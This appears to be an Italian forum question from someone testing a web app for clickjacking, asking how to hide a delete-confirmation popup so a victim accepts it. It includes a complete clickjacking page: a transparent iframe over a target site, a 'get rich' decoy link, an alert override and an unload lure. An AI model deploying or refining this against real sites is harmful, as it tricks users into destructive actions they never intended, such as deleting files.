Sto testando un'applicazione Web per la vulnerabilità di click-jacking. L'attacco funziona bene per singoli clic, tuttavia sto cercando di eliminare un file e il frame nascosto (vittima) genera una conferma a comparsa.
C'è un modo per nascondere il popup (lo stesso del fotogramma) e indurre l'utente ad accettarlo. Ho cercato su Google molto ma senza fortuna: (
Anche i buster dei frame busting non funzionano.
Aiutatemi, grazie
Sto facendo qualcosa di sbagliato Codice pagina click-jacking:
<html>
<body>
<script>
window.alert = function() { return false; }
</script>
<script>
window.onbeforeunload = function()
{
return "Maybe you want to leave the page, before you become rich??";
}
</script>
<style>
iframe {
width:100%;
height:100%;
position:absolute;
top:0; left:0;
filter:alpha(opacity=50); /* in real life opacity=0 */
opacity:0.5;
}
</style>
<div>Click on the link to get rich now:</div>
<iframe src="https://xyz.com/Forms/AllItems.aspx"></iframe><ahref="https://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>
<div>You'll be rich for the whole life!</div>
</body>
</html>